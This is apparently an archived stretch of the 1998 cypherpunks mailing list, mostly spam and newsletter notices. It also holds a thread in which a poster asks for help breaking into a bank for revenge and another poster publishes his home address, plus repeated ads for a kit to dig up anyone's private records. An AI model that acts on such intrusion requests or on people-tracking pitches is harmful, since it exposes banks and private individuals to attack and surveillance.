>>26 H Kamagong St., Commonwealth, Quezon City, Philippines,1121
>I reckon that one gets my vote...:)

:-)

But even Cluelesser is the guy who just asked for help with a firewall
configuration on the NT system admin list and gave a 5 screensfull
description of how they have set up their firewall and servers, 
what proxies they have, what they block and allow through... 
down to and including saying that they *haven't* installed the 
MS recommended hotfixes for NT security.

Of course, it could always be bait.

As, I suppose, could the Italian Bank post, although
if I was dragnetting for stupid hackers I'd have hoped
I'd be able to come up with something more plausible.


Ken Brown




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ish@salta-server.com.ar
Date: Wed, 19 Aug 1998 02:37:45 -0700 (PDT)
To: Customer@aol.com
Subject: Find Out Anything About Anyone On The Net  !!!!
Message-ID: <199808190934.EAA29931@sunsrv09>
MIME-Version: 1.0
Content-Type: text/plain



YOU can easily learn how to investigate and learn EVERYTHING 
about your employees, neighbors, friends, enemies, and or
anyone else  !!!


It is absolutely amazing !!!
YOU Must Get This Extraordinary Package today.........


   +  YOU can track down an old friend or a lost love,
     and, just for fun, investigate your family history.

   +  YOU can screen prospective employees criminal records,
     look at their driving, or credit history.

   +  YOU can verify test results from drug testing and even
     look into your children's friends history for any type 
     of record.

   +  YOU can TRACK down and locate an old debtor who is
     hiding from you and see if he/she is hiding any assets.

   +  YOU can look up "unlisted telephone numbers."  Locate
     social security, birth, adoption or death records.
     Check Army, Navy, Marine Corps, or Air Force service
     file records.  YOU will simply be amazed to learn what
     sensitive and important information other people and
     enemies can discover about YOU !!!!!

YOU Can Find Out Anything About Anyone On The Net !!!
Do background checks on people and charge for it, as
you start your own investigative services.
Stop guessing about the LAW !!!
Look up laws and do much more, direct from famous law libraries.
Get this easy to use  KIT  right away, and then,
YOU can become a private investigator.

ORDER TODAY !!!!!


Send $15.00 cash (wrapped in two pieces of paper),
money order, or check to:

                    INFORMATION, Ltd.
                    P. O. Box  515019
                    St. Louis,  MO  63151-5019  USA

The Complete Package Will Be Immediately Shipped
Prepaid Directly to You With Everything You Will Need
In Your Kit to Get Started Right Away !!

THANK YOU for your kind attention, and have a nice day !!!!





++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Admin
Internet Services
This message is not intended for residents in the 
State of Washington, screening of addresses has been done
to the best of our technical ability.
If you are a Washington resident or otherwise wish to be
removed from this list, go to global remove site if you want
your address removed from future mailing. 
http://209.84.246.162/remove.htm
 
This Global Communication has been sent to you by:
PAVILION ADVERTISING SERVICES
Offices:  London, Paris, Berlin, Hong Kong






















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fsilva@paradisenet.cl
Date: Wed, 19 Aug 1998 03:59:54 -0700 (PDT)
To: Customer@aol.com
Subject: Find Out Anything About Anyone On The Net  !!!!
Message-ID: <199808191040.FAA05819@sunsrv09>
MIME-Version: 1.0
Content-Type: text/plain



YOU can easily learn how to investigate and learn EVERYTHING 
about your employees, neighbors, friends, enemies, and or
anyone else  !!!


It is absolutely amazing !!!
YOU Must Get This Extraordinary Package today.........


   +  YOU can track down an old friend or a lost love,
     and, just for fun, investigate your family history.

   +  YOU can screen prospective employees criminal records,
     look at their driving, or credit history.

   +  YOU can verify test results from drug testing and even
     look into your children's friends history for any type 
     of record.

   +  YOU can TRACK down and locate an old debtor who is
     hiding from you and see if he/she is hiding any assets.

   +  YOU can look up "unlisted telephone numbers."  Locate
     social security, birth, adoption or death records.
     Check Army, Navy, Marine Corps, or Air Force service
     file records.  YOU will simply be amazed to learn what
     sensitive and important information other people and
     enemies can discover about YOU !!!!!

YOU Can Find Out Anything About Anyone On The Net !!!
Do background checks on people and charge for it, as
you start your own investigative services.
Stop guessing about the LAW !!!
Look up laws and do much more, direct from famous law libraries.
Get this easy to use  KIT  right away, and then,
YOU can become a private investigator.

ORDER TODAY !!!!!


Send $15.00 cash (wrapped in two pieces of paper),
money order, or check to:

                    INFORMATION, Ltd.
                    P. O. Box  515019
                    St. Louis,  MO  63151-5019  USA

The Complete Package Will Be Immediately Shipped
Prepaid Directly to You With Everything You Will Need
In Your Kit to Get Started Right Away !!

THANK YOU for your kind attention, and have a nice day !!!!





++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Admin
Internet Services
This message is not intended for residents in the 
State of Washington, screening of addresses has been done
to the best of our technical ability.
If you are a Washington resident or otherwise wish to be
removed from this list, go to global remove site if you want
your address removed from future mailing. 
http://209.84.246.162/remove.htm
 
This Global Communication has been sent to you by:
PAVILION ADVERTISING SERVICES
Offices:  London, Paris, Berlin, Hong Kong






















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Wed, 19 Aug 1998 03:39:16 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: KGB plotted to blow up Elvis/Sony release 'X-Ray Vision' camera http://stuffed.net/98/8/19/
Message-ID: <19980819080001.21579.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/19/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: viewzone@cyber-host.net
Date: Wed, 19 Aug 1998 09:47:13 -0700 (PDT)
To: <elders@toad.com>
Subject: AD: New on-line zine needs YOUR help!
Message-ID: <199808191647.JAA02312@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


This message is sent in compliance with the new e-mail bill: SECTION 301, 
Paragraph (a)(2)(C) of s. 1618

Sender : ViewZone, 1 Phelps Lane, Simsbury, CT 06070
Phone  : 1-860-651-7433
E-mail : viewzone@cyber-host.net

To be removed from our mailing list, simply reply with "REMOVE" in the
subject.
-----------------------------------------------------------------------

We'd Like Your Help

ViewZone is an on-line magazine that looks at life from different angles. 
It's hard to describe but we think you'll enjoy it - AND we want your opinion.

Viewzone is a little crazy at times, thought provoking, sometimes
controversial - but always entertaining. 

""""We hate spam (except for breakfast) - but we thought you'd want to
check out this new on-line magazine. It's FREE and, well, we'd like your
opinion on what you see."""""

Weird science, humor, reality(!), interesting personalities and
interesting adventures... check us out! (e-mail back from the site)

We're at: 

http://www.viewzone.com

Gary Vey
CEO, Viewzone Magazine
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Griffiths <griffith@wis.weizmann.ac.il>
Date: Wed, 19 Aug 1998 00:20:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <Pine.LNX.3.96.980818192206.1100B-100000@mothra.fastrans.com>
Message-ID: <35DA7BCC.DABD01B8@wis.weizmann.ac.il>
MIME-Version: 1.0
Content-Type: text/plain


Jim Burnes wrote:

> I usually ignore these type of messages, but this one gets my vote
> for the most clueless post of all time. ;-)

and then Bernardo replied to John Perry's troll, err, offer of help...

>>Sure thing! Just send us your full name, address (mailing and physical),
>>and phone number. I'm sure you will get plenty of help.

>Here is my address  
>26 H Kamagong St., Commonwealth, Quezon City, Philippines,1121

I reckon that one gets my vote...:)

Tim G

--
Tim Griffiths                   griffith@wis.weizmann.ac.il
Center for Submicron Research   http://tim01.ex.ac.uk
Weizmann Institute of Science   (972)-8-934-2736
Rehovot 76100 Israel
PGP Public key available - finger tim@tim01.ex.ac.uk

The real value lies not in what I say or do,
but in your reaction to it.  -DF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 19 Aug 1998 08:03:38 -0700 (PDT)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Re: Firm X
Message-ID: <199808191505.LAA19288@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 18 Aug 1998 08:27:00 -0700, Dave Del Torto wrote:

>candidates must be willing to undertake relocation to 'firm x' offices in
>switzerland or bordering nations.

A swiss crypto-firm?  I have no IDEA...

:-)

Ciao

jfa



Jean-Francois Avon, Pierrefonds (Montreal), Canada

Unregistered Firearms in the hands of honest citizens: Liberty's Teeth
Strong Cryptographic tools in the hands of honest citizens: Liberty's Voice

He who beats his sword into a ploughshare will get coerced to plow for 
those who don't...

PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: future <future@aoci.com>
Date: Wed, 19 Aug 1998 10:53:49 -0700 (PDT)
To: (Dear Friend)
Subject: ADV: Your Email Journal Of HOME BUSINESS & MODERN NETWORKING
Message-ID: <199808191710.NAA27721@host.online-systems.net>
MIME-Version: 1.0
Content-Type: text/plain


Get your own FREE Lifetime Subscription at:
http://futurevisiononline.com/html/default_free_newsletter_series.html
------------------------------------------------------------
Now you can receive valuable insider's information
for FREE! You will learn the real "InsideStrategies"-
used by prospering individuals nationwide to gain Financial
Independence...All Right from the Comfort of Your Own Home!

And it's Absolutely FREE-You Will Find Out How To:

- Multiply your income right from home.
- Save thousands every year with a home business.
- Assess income that can continue long after you retire.
- Turn your computer, phone, and mail into profit.
- Start a home business-and save money doing it!
- Break free of your J.O.B. (Just Above Broke)
- Get thousands of dollars of free advertising.
- Profit putting in just a few hours a week from home.
- Be your own boss and keep all the profit.
- Have greater success in casual dress than a suit and tie.
- Control your earnings with no ceiling on your income.
- Make more money from home than your 9 to 5 spouse.
- Make money your very first month in business.
- And Much Much More...ALL FREE!!!

Now you can instantly be receiving valuable information, and
find out how to make more money than ever-right from
home...And the best part is it's FREE!

If you are interested in real ways to make money right from
home-each issue of this professional journal will provide
you with a wealth of information. Get you FREE Lifetime
Subscription now at:
http://futurevisiononline.com/html/default_free_newsletter_series.html

Your Email Journal Of...
HOME BUSINESS & MODERN NETWORKING
           "FREE Lifetime Subscription"
------------------------------------------------------------
Get your own FREE Lifetime Subscription at:
http://futurevisiononline.com/html/default_free_newsletter_series.html

P.S. This is a absolutely FREE subscription you can
cancel at any time by simply selecting the unsubscribe
option sent with each issue. This extremely valuable journal
is available by subscription only. You can get your FREE
Lifetime Subscription right now at:
http://futurevisiononline.com/html/default_free_newsletter_series.html





















---------------
To never receive commercial emails or offerings from any vendor
please reply with 'REMOVE' in the subject field.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Tue, 18 Aug 1998 22:10:28 -0700 (PDT)
To: paolo <fansword@tin.it>
Subject: Re: your mail
In-Reply-To: <199808190006.CAA25721@mail.tol.it>
Message-ID: <Pine.GSO.3.96.980819131517.21889A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain


You should think it over and over again coz you might get busted....
   remember there are other hackers who can detect you....





Just a friendly reminder....














===============================================================================
It's funny, I have always been a good 
	listener who understood and cared
		someones secrets, but to my dismay 
			I have never been understood.


metaphone@altavista.net

On Wed, 19 Aug 1998, paolo wrote:

> Sorry I'm not very expert about invading systems but I need your help to
> enter in a bank.I have all the informations and I need to know if it is
> possible to enter. 
> They were not very correct with me and now they must pay for it.What do you
> think about that?
> Can you help me to find any good italian hackers?
> ZORRO
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Tue, 18 Aug 1998 22:20:45 -0700 (PDT)
To: John Perry <perry@jpunix.com>
Subject: Re: your mail
In-Reply-To: <19980818210749.A29422@jpunix.com>
Message-ID: <Pine.GSO.3.96.980819132232.21889C-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain


Phone number?  Isn't that one of the ways we can get in a system? using a
phone.


Anyway I'm interested, but I do not have  a phone.
Here is my address  
26 H Kamagong St., Commonwealth, Quezon City, Philippines,1121
 




===============================================================================
It's funny, I have always been a good 
	listener who understood and cared
		someones secrets, but to my dismay 
			I have never been understood.


metaphone@altavista.net

On Tue, 18 Aug 1998, John Perry wrote:

> On Wed, Aug 19, 1998 at 02:07:12AM +0200, paolo wrote:
> > 
> > Sorry I'm not very expert about invading systems but I need your help to
> > enter in a bank.I have all the informations and I need to know if it is
> > possible to enter. 
> > They were not very correct with me and now they must pay for it.What do you
> > think about that?
> > Can you help me to find any good italian hackers?
> > ZORRO
> 
> Sure thing! Just send us your full name, address (mailing and physical),
> and phone number. I'm sure you will get plenty of help.
> 
> -- 
>  John Perry perry@jpunix.com PGP-encrypted e-mail welcome!
>  WWW - http://www.jpunix.com
>  PGP 2.62 key for perry@jpunix.com is on the keyqservers.
>  http://rc5stats.distributed.net/tmsummary.idc?TM=4264 for freechess.org RC5.
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Wed, 19 Aug 1998 12:38:02 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 18, 1998
Message-ID: <199808191931.OAA09948@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3995.1071713795.multipart/mixed"

--Boundary..3995.1071713795.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

If you cannot open the icon/attachment, please visit
http://www.wow-com.com/professional/     for the wireless 
daily news.

Don't miss the major conference on implementing 
Phase 2 of the E-911 requirement--August 26-27 
in San Francisco.  For more information, click 
http://www.wow-com.com/pdf/locntech.pdf 
===========================================
 




--Boundary..3995.1071713795.multipart/mixed
Content-Type: application/octet-stream; name="bin00004.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00004.bin"
Content-Description: "_CTIA_Daily_News_19980818.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOzxjZW50ZXI+CjxUQUJMRSBCT1JERVI9
MCBDT0xTPTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09N
LkNPTSIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9B
PjwvVEQ+Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53aXJl
bGVzc2l0LmNvbSI+PElNRyBTUkM9Imh0dHA6Ly93d3cud293LWNvbS5jb20v
aW1hZ2VzL2FydGRyb3AvMHdpcmVsZXNzaXQuZ2lmIiBBTFQ9IlRvZGF5J3Mg
TmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgSS5ULiA5OCIgTk9TQVZFIEJP
UkRFUj0wIEhFSUdIVD02MCBXSURUSD0yMzQ+PC9BPjwvQ0VOVEVSPgo8L1RE
Pgo8L1RSPgo8L1RBQkxFPgombmJzcDsKPFRBQkxFIEJPUkRFUj0wIFdJRFRI
PSI2MDAiID4KPFRSIEJHQ09MT1I9IiMwMDAwOTkiPgo8VEQ+PC9URD4KCjxU
RD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIENPTE9S
PSIjQ0NDQ0NDIj48Rk9OVCBTSVpFPSsxPkNUSUEKRGFpbHkgTmV3cyBmcm9t
IFdPVy1DT00gLSBBdWd1c3QgMTgsIDE5OTg8L0ZPTlQ+PC9GT05UPjwvRk9O
VD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD4KPEhSIFdJRFRIPSI1ODAiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPSsxPkNvbnN1bWVyIFJlcG9ydHMgUmF0ZXMK
V2lyZWxlc3MgUGhvbmVzIGFuZCBTZXJ2aWNlczwvRk9OVD48L0ZPTlQ+PC9C
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5BIHdvcmtzaGVldCBpbiB0
aGUgU2VwdGVtYmVyIChQLiAyNCkgaXNzdWUKYW5kIG9uIENvbnN1bWVyIFJl
cG9ydHMgT25saW5lLCB3d3cuQ29uc3VtZXJSZXBvcnRzLm9yZywgaGVscHMg
Y29tcHV0ZQp3aGljaCBjb21iaW5hdGlvbiBvZiBjZWxsIHBob25lIGFuZCBz
ZXJ2aWNlIGNvc3RzIGxlc3MuIFRoZSBjb21wcmVoZW5zaXZlCnJlcG9ydCBv
biBjZWxsdWxhciBwaG9uZXMgYW5kIHBob25lIHNlcnZpY2VzIGFsc28gaW5j
bHVkZXMgYSBsb29rIGF0OiB0aGUKcHJvcyBhbmQgY29ucyBvZiBhbmFsb2cg
dnMuIGRpZ2l0YWwgaGFuZHNldHM7IGEgY29tcGFyaXNvbiBvZiBob3cgT21u
aXBvaW50LApTcHJpbnQsIGFuZCBCZWxsIEF0bGFudGljIHBlcmZvcm1lZCBp
biBvbmUgbWV0cm9wb2xpdGFuIGFyZWE7IHRoZSBuZXcgcGxhbnMKc3VjaCBh
cyBBVCAmYW1wOyBUIE9uZSBSYXRlIGFuZCBwcmVwYWlkIGNlbGx1bGFyOyBh
bmQgdGhlIGNvc3Qgb2YgYmVpbmcKY29ubmVjdGVkIGluIHRoZSAxNSBsYXJn
ZXN0IFUuUy4gd2lyZWxlc3MgbWFya2V0cy4gKDxBIEhSRUY9Imh0dHA6Ly9i
aXoueWFob28uY29tL2J3Lzk4MDgxNy9jb25zdW1lcnNfXzMuaHRtbCI+WUFI
T088L0E+KQotICg8QSBIUkVGPSJodHRwOi8vd3d3LkNvbnN1bWVyUmVwb3J0
cy5vcmcvU3BlY2lhbC9DdXJyZW50SXNzdWUvaW5kZXguaHRtbCI+Q09OU1VN
RVIKUkVQT1JUUzwvQT4tLVRvIHJlYWQgdGhlIENvbnN1bWVyIFJlcG9ydHMg
c3RvcnksIHlvdSBtdXN0IHN1YnNjcmliZSB0bwp0aGlzIHNpdGUuKTwvRk9O
VD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0la
RT0rMT5OYXRpb25hbCBUYXhwYXllcnMgVW5pb24KVW52ZWlscyBDYW1wYWln
biB0byBSZXBlYWwgVGF4Jm5ic3A7PEJSPgp0byBGdW5kIEUtUmF0ZTwvRk9O
VD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUg
MzAwLDAwMC1tZW1iZXIgTmF0aW9uYWwgVGF4cGF5ZXJzClVuaW9uIChOVFUp
IGhhcyBsYXVuY2hlZCBhbiBJbnRlcm5ldC1iYXNlZCBjYW1wYWlnbiBhaW1l
ZCBhdCBzdG9wcGluZyB0aGUKdGF4IHRoYXQgZnVuZHMgdGhlIGluaXRpYXRp
dmUgdG8gY29ubmVjdCBzY2hvb2xzIGFuZCBsaWJyYXJpZXMgdG8gdGhlIElu
dGVybmV0LgpDb25ncmVzc2lvbmFsIGxlYWRlcnMgaGF2ZSBjcml0aWNpemVk
IHRoZSBwcm9ncmFtIGFzIGEgYmFjay1kb29yIHRheCBpbXBvc2VkCndpdGhv
dXQgZGlyZWN0IGNvbmdyZXNzaW9uYWwgY29uc2VudC4gKDxBIEhSRUY9Imh0
dHA6Ly9iaXoueWFob28uY29tL3BybmV3cy85ODA4MTgvZGNfbnR1X3dlYl8x
Lmh0bWwiPllBSE9PPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+U3VuIE1pY3Jvc3lzdGVtcywg
THVjZW50CkFubm91bmNlIFBhY3QgdG8gSW50ZWdyYXRlJm5ic3A7PEJSPgpN
ZXNzYWdpbmcgU2VydmljZXM8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+VGhlIG5ldHdvcmtpbmcgc29mdHdhcmUgY29t
cGFuaWVzIHdpbGwKam9pbnRseSBkZXZlbG9wIHNvZnR3YXJlIHRoYXQgaW50
ZWdyYXRlcyB0aGVpciByZXNwZWN0aXZlIElTUCBhbmQgY29tbXVuaWNhdGlv
bnMKc3lzdGVtIHNvZnR3YXJlLiBUaGUgcmVzdWx0OiBpbnRlZ3JhdGVkIHZv
aWNlLCBlbWFpbCwgYW5kIGZheCBzZXJ2aWNlcwpvbiBhIHdpcmVsZXNzLCB3
b3JsZHdpZGUgYmFzaXMuICg8QSBIUkVGPSJodHRwOi8vd3d3LndpcmVkLmNv
bS9uZXdzL25ld3MvdGVjaG5vbG9neS9zdG9yeS8xNDQ2Ny5odG1sIj5XSVJF
RDwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij48Rk9OVCBTSVpFPSsxPkVyaWNzc29uIFVudmVpbHMgU25hcC1PbgpXaXJl
bGVzcyBEYXRhL0ZheCBNb2RlbTwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFD
RT0iQXJpYWwsSGVsdmV0aWNhIj5Fcmljc3NvbiBzYXlzIGl0cyBESSAyNyBp
cyB0aGUgd29ybGQncwpmaXJzdCBzbmFwLW9uIHdpcmVsZXNzIGRhdGEvZmF4
IGluZnJhcmVkIG1vZGVtLiBJdCBlbGltaW5hdGVzIHRoZSBuZWVkCnRvIGNv
bm5lY3QgYSB0cmFkaXRpb25hbCBQQyBtb2RlbSBjYXJkIGFuZCB0ZWxlcGhv
bmUgbGluZSB0byBhIHBob25lIGphY2ssCm9yIHVzaW5nIGEgY2FibGUgdG8g
Y29ubmVjdCBhIG1vYmlsZSBwaG9uZSB0byBhIG1vZGVtIGNhcmQuIFdlaWdo
aW5nIGxlc3MKdGhhbiBoYWxmIGFuIG91bmNlIGFuZCBoYWxmIHRoZSBzaXpl
IG9mIGEgbWF0Y2hib3gsIEVyaWNzc29uIHNheXMgaXQgaXMKYWxzbyB0aGUg
c21hbGxlc3QgbW9kZW0gYXZhaWxhYmxlLiZuYnNwOyAoPEEgSFJFRj0iaHR0
cDovL2Jpei55YWhvby5jb20vYncvOTgwODE3L2VyaWNzc29uXzIuaHRtbCI+
WUFIT088L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+PEZPTlQgU0laRT0rMT5MdWNlbnQgR2V0cyBBY3F1aXNpdGlvbgpH
cmVlbiBMaWdodDwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWws
SGVsdmV0aWNhIj5TaW5jZSBpdHMgc3Bpbi1vZmYgdHdvIHllYXJzIGFnbyBm
cm9tCkFUJmFtcDtULCBMdWNlbnQgaGFzIGJlZW4gcmVzdHJpY3RlZCBieSB0
aGUgdGVybXMgb2YgaXRzIHNlcGFyYXRpb24gZnJvbQp0aGUgdGVsZWNvbW11
bmljYXRpb25zIGdpYW50IHRvIGFjcXVpcmluZyBzbWFsbGVyIGNvbXBhbmll
cy4gQnV0IHN0YXJ0aW5nCmluIE9jdG9iZXIsIEx1Y2VudCB3aWxsIGJlIGFi
bGUgdG8gdXNlIHRoZSAicG9vbGluZyBvZiBpbnRlcmVzdHMiIG1ldGhvZApv
ZiBkZWFsIG1ha2luZywgYW4gYWNjb3VudGluZyBtZXRob2QgdGhhdCB3aWxs
IGFsbG93IGZvciBzdG9jay1zd2FwIHRha2VvdmVycywKd2hpY2ggdWx0aW1h
dGVseSBsb3dlciB0aGUgY29zdCBvZiBtYWtpbmcgYWNxdWlzaXRpb25zLiBB
bmFseXN0cyBhbG1vc3QKdW5hbmltb3VzbHkgYWdyZWUgdGhhdCBMdWNlbnQn
cyBOby4gMSB0YWtlb3ZlciB0YXJnZXQgd2lsbCBiZSBBc2NlbmQgQ29tbXVu
aWNhdGlvbnMuCig8QSBIUkVGPSJodHRwOi8vd3d3Lm5ld3MuY29tL05ld3Mv
SXRlbS9UZXh0b25seS8wLDI1LDI1MzYxLDAwLmh0bWw/cGZ2Ij5ORVdTLkNP
TTwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij48Rk9OVCBTSVpFPSsxPkNlbGwgUGhvbmUgSGFzIEEgUGxhY2UKb24gQm9h
dCwgYnV0IFZIRiBJcyB0aGUgQ2hvaWNlJm5ic3A7PEJSPgppbiBhbiBFbWVy
Z2VuY3ksIENvbHVtbmlzdCBXcml0ZXM8L0ZPTlQ+PC9GT05UPjwvQj48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+QXMgbW9yZSBib2F0ZXJzIHJlbHkg
b24gY2VsbHVsYXIgcGhvbmVzCmZvciB0aGVpciBjb21tdW5pY2F0aW9uIG5l
ZWRzLCBhbiBpbmZvcm1hbCBwb2xlIHNob3dzIHRoYXQgbWFueSBUb2xkZW8s
Ck9oaW8gYXJlYSBib2F0ZXJzIGNob29zZSBWSEYgaW4gYW4gZW1lcmdlbmN5
IHNpdHVhdGlvbiwgY29sdW1uaXN0IFNoaXJsZXkKTGV2eSB3cml0ZXMuJm5i
c3A7IFZIRiBoYXMgZ3JlYXRlciByYW5nZS0tdXAgdG8gNTAgbWlsZXMsIGNv
bXBhcmVkIHRvIDEwCnRvIDE1IG1pbGVzIGZvciBjZWxsdWxhci0tcHJvdmlk
ZXMgY2xlYXIsIHVuaW50ZXJydXB0ZWQgc2VydmljZSwgZmFjaWxpdGF0ZXMK
cG9zaXRpb24gdHJhY2tpbmcsIGFuZCBpcyB0aGUgYmVzdCB3YXkgdG8gcmVh
Y2ggdGhlIHJpZ2h0IHBlb3BsZSBpbW1lZGlhdGVseS4KKDxBIEhSRUY9Imh0
dHA6Ly93d3cudG9sZWRvYmxhZGUuY29tL2VkaXRvcmlhbC9zcG9ydHM5OC84
aDE0c2FpbC5odG0iPlRPTEVETwpCTEFERTwvQT4pPC9GT05UPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZP
